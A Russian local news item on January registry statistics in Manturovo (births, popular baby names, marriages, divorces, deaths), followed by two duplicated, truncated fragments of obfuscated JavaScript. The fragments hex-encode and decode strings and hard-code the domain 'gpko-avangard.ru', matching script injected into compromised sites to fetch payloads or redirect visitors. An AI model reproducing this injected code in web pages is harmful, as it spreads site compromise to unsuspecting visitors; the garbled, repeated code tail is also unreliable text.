Демография: Девочек больше

Демография: Девочек больше

Как стало известно из статистики ЗАГСа, нынешний январь на события, связанные с рождением детей, небогат. Время было морозным — ни аистов, ни капусты… Всего родилось 17 малышей, из них 6 мальчиков, 11 девочек. В январе прошлого года новорождённых было на четыре больше.

Мальчиков называли Александрами и Владимирами, Николаями и Кириллами. Среди девочек, рождённых в январе этого года, — Виолетты и Ульяны, Василисы и Вероники. Первенцы родились в четырёх семьях, вторые дети появились в девяти, многодетными стали три семьи и в одной семье родился 4-ый ребёнок.
В минувшем месяце зарегистрировано 7 браков. Это ровно столько же, что и в январе предыдущего года. Разводов — 8, тогда как в 2015 году их было на 2 меньше.
В мир иной ушли 30 мантуровцев, прошлый январь был суровее — покинули этот мир 38 наших земляков.
В последние годы среди брачующихся был всплеск, связанный с Днём всех влюблённых. Но, по-видимому, эта традиция не приживается. Свадеб на 14 февраля не предвидится. Минувший понедельник для сотрудников ЗАГСа был отмечен тем, что зарегистрировано 5 рождений и выдано 4 свидетельства о смерти. Таково начало февраля…

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «gpko-avangard.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gpko-avangard.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e